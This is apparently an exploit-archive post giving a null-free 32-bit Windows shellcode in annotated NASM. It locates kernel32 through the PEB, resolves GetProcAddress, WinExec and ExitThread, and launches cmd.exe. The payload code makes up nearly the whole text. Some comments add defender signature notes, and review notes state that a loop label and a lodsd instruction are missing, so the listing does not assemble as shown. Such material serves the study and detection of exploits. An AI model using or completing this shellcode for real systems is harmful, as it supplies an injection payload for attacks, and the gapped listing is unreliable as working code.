
Microsoft Windows 32-bit / 64-bit cmd.exe Shellcode

Microsoft Windows 32-bit / 64-bit cmd.exe Shellcode
Posted May 18, 2017
Authored by Filippo Bersani

Small (718 byte) Microsoft Windows 32-bit/64-bit cmd.exe shellcode.

tags | shellcode
systems | windows
SHA-256 | d22926562b5b0ac2e30ac709b50939384bfa98eedfd49cbd8ba8c5e45f922b67

Microsoft Windows 32-bit / 64-bit cmd.exe Shellcode

;Full tutorial: https://www.zinzloun.info [#Windows CMD shellcode]

;nasm.exe [-f win32] dynamic.asm -o dynamic.obj
;SKIP -f win32 to create the .obj file to extract eventually the hex code
;then execute: [python bin2hex.py dynamic.obj] to get the hex code:


;you can download the python script here: https://github.com/zinzloun/infoSec/blob/master/bin2hex.py

;GoLink.exe /console /entry _start dynamic.obj

;Tested and coded on Win10 Home edition 64, tested also on: Win7 EE 32, Win Srv 2012 R2 64

;-----------------------------------------------------------------------
; _start — raw 32-bit position-independent code blob (NASM syntax).
; Not a callable function: no prologue, no frame, no return path; the
; blob ends by calling ExitThread.
; Flow, as written below:
;   1. locate the kernel32.dll base through the PEB loader list
;   2. walk kernel32's export directory by name to find GetProcAddress
;   3. use GetProcAddress to resolve WinExec and ExitThread
;   4. WinExec("cmd.exe ", SW_SHOWNORMAL), then ExitThread(0)
; Register roles: ebx = kernel32 base; edx = export directory, later
; GetProcAddress; esi = GetProcAddress, later ExitThread; edi = WinExec;
; ecx = scratch / name index. ebx, esi, edi are callee-saved under the
; Win32 stdcall convention, which is why they survive the calls below.
; Every constant and addressing form is chosen so that no zero byte is
; emitted; the comments that say "trick" / "avoid null" refer to that.
; The title's "64-bit" claim presumably means running as a 32-bit process
; (WoW64) — the code itself is [BITS 32] only; confirm against the
; tutorial linked in the header.
; NOTE(review): `global _start` is declared but no `_start:` label is
; present in this listing, and the `jnz Find_GetProc` instructions below
; reference a label that is never defined here; the `lodsd` that the
; comments at the loop head describe is absent as well. As shown, the
; listing would not assemble — lines were probably lost when the page was
; captured, so the original file should be consulted rather than having
; the gaps reconstructed from here.
; Defender notes: the FS:[0x30] -> Ldr -> InInitializationOrderModuleList
; walk, the three 4-byte compares against "GetProcAddre", and the ASCII
; stack strings ("AWinExec", "AAExitThread", "cmd.exe ") are the stable,
; signature-friendly features of this sample.
;-----------------------------------------------------------------------
[BITS 32]

[SECTION .text]
global _start

xor ecx, ecx ; ecx = 0 without a zero byte in the encoding; ecx also serves as the index register so that [FS:ecx+0x30] needs no NULL displacement
MOV EAX, [FS:ecx+0x30] ; EAX = PEB (on 32-bit Windows the FS base is the TEB; TEB+0x30 holds the PEB pointer)
MOV EAX, [eax+0x0C] ; EAX = PEB->Ldr (PEB_LDR_DATA)
MOV EAX, [EAX+0x1C] ; EAX = PEB->Ldr.InInitializationOrderModuleList.Flink (first entry)
; Follow Flink twice. The author assumes the list order ntdll -> KernelBase -> kernel32 (Win7+ layout);
; that assumption is what ties the sample to the OS versions listed in the header.
mov eax, [eax+ecx] ; EAX = 2nd entry (KernelBase); "+ecx" (ecx == 0) avoids a zero displacement byte
mov eax, [eax+ecx] ; EAX = 3rd entry (kernel32)
; End of list walk
MOV EBX, [EAX+8] ; EBX = DllBase of that entry (offset 8 from the InInitializationOrder links) = kernel32 base

;Find the EXPORT TABLE of kernel32.dll
mov edx, [ebx + 0x3c] ; EDX = IMAGE_DOS_HEADER.e_lfanew (offset 60)
add edx, ebx ; EDX = IMAGE_NT_HEADERS (1)
mov edx, [edx + 0x78] ; EDX = RVA of the export directory (offset 120 from the PE signature)
add edx, ebx ; EDX = IMAGE_EXPORT_DIRECTORY (2); kept in edx because the ordinal and function tables are read from it later (*)
mov esi, [edx + 0x20] ; ESI = RVA of AddressOfNames
add esi, ebx ; ESI = AddressOfNames (3): array of RVAs to the export name strings

;Find GetProcAddress by name. ecx counts names 1-based; ecx-1 is the array index.
; NOTE(review): the loop-head label (Find_GetProc:) and the lodsd instruction described by the
; next comments are missing from this listing; the jnz instructions below target that label.
inc ecx ; Increment the counter (we start from 1)
; lodsd would load the dword at [esi] (the RVA of the current name) into EAX and advance esi by 4,
; so that esi already points at the next name's RVA on the following iteration.
add eax, ebx ; EAX = name string (RVA + base); depends on eax holding the RVA loaded by the missing lodsd
cmp dword [eax], 0x50746547 ; "GetP" — first 4 bytes of "GetProcAddress" as a little-endian dword
jnz Find_GetProc
cmp dword [eax + 0x4], 0x41636f72 ; "rocA"
jnz Find_GetProc
cmp dword [eax + 0x8], 0x65726464 ; "ddre" — the trailing "ss" is not checked; the author treats the 12-byte prefix as sufficient
jnz Find_GetProc
dec ecx ; counter is 1-based, the name array index is 0-based
; ECX = index into AddressOfNames; AddressOfNameOrdinals[ecx] yields the index into AddressOfFunctions

;Find the address of GetProcAddress function
mov esi, [edx + 0x24] ; ESI = RVA of AddressOfNameOrdinals (4)(*)
add esi, ebx ; ESI = AddressOfNameOrdinals (WORD array)
mov cx, [esi + ecx * 2] ; CX = AddressOfNameOrdinals[ecx]. Only the low word is written, so this relies on
; the name index being below 0x10000 — the untouched upper half of ECX is then already zero,
; and ECX as a whole is the index into AddressOfFunctions.
mov esi, [edx + 0x1c] ; ESI = RVA of AddressOfFunctions (5)
add esi, ebx ; ESI = AddressOfFunctions (DWORD array)
mov edx, [esi + ecx * 4] ; EDX = AddressOfFunctions[ecx] = RVA of GetProcAddress
; scale 4 because each entry is a 4-byte RVA and ESI points at the start of the array
add edx, ebx ; EDX = GetProcAddress (virtual address)

mov esi, edx ; ESI = GetProcAddress; esi is callee-saved, so it survives the stdcall calls below

;Resolve WinExec: GetProcAddress(kernel32 base, "WinExec")
xor ecx,ecx
push ecx ; NUL terminator for the string built on the stack
;a leading 'A' pads the name to 8 bytes so both pushes are zero-byte free; ecx is then advanced past it
push 0x63657845 ; "Exec"
push 0x6e695741 ; "AWin" -> the stack now reads "AWinExec\0" (capital E: the export name lookup is case-sensitive)
mov ecx,esp
lea ecx, [ecx+1] ; skip the 'A' pad -> "WinExec\0"
push ecx ; lpProcName
push ebx ; hModule = kernel32 base (stdcall: the last push is the first argument)

call esi ;Call GetProcAddress: the return result is saved in EAX

xchg edi,edx ; leftover: edi is overwritten on the next line and edx is not read again, so this swap has no effect on the result
mov edi, eax;save WinExec address in EDI (callee-saved, survives the following calls)

;Resolve ExitThread: GetProcAddress(kernel32 base, "ExitThread")
xor ecx,ecx
push ecx ; NUL terminator
;same padding trick, with two 'A's so that the 10-byte name fills three dwords
PUSH 0x64616572 ; "read"
PUSH 0x68547469 ; "itTh"
PUSH 0x78454141 ; "AAEx" -> the stack now reads "AAExitThread\0"

mov ecx,esp
lea ecx, [ecx+2] ; skip the "AA" pad -> "ExitThread\0"

push ecx ; lpProcName
push ebx ; hModule = kernel32 base

call esi ;Call GetProcAddress: the return result is saved in EAX
mov esi, eax; ESI = ExitThread (GetProcAddress is no longer needed, so its register is reused)

;Run the command: WinExec("cmd.exe ", SW_SHOWNORMAL)
xor ecx,ecx
push ecx ; NUL terminator
push 0x20657865 ; "exe "
push 0x2e646d63 ; "cmd." -> the stack now reads "cmd.exe \0" (the trailing space pads the string to 8 bytes so no zero byte is needed)

mov ecx,esp ; ecx = "cmd.exe "
push 0x1 ; uCmdShow = 1 (SW_SHOWNORMAL)
push ecx ; lpCmdLine

call edi ; WinExec("cmd.exe ", 1)

;Exit the current thread rather than falling through past the end of the blob
xor ecx,ecx
push ecx ; dwExitCode = 0
call esi ; ExitThread(0) — does not return
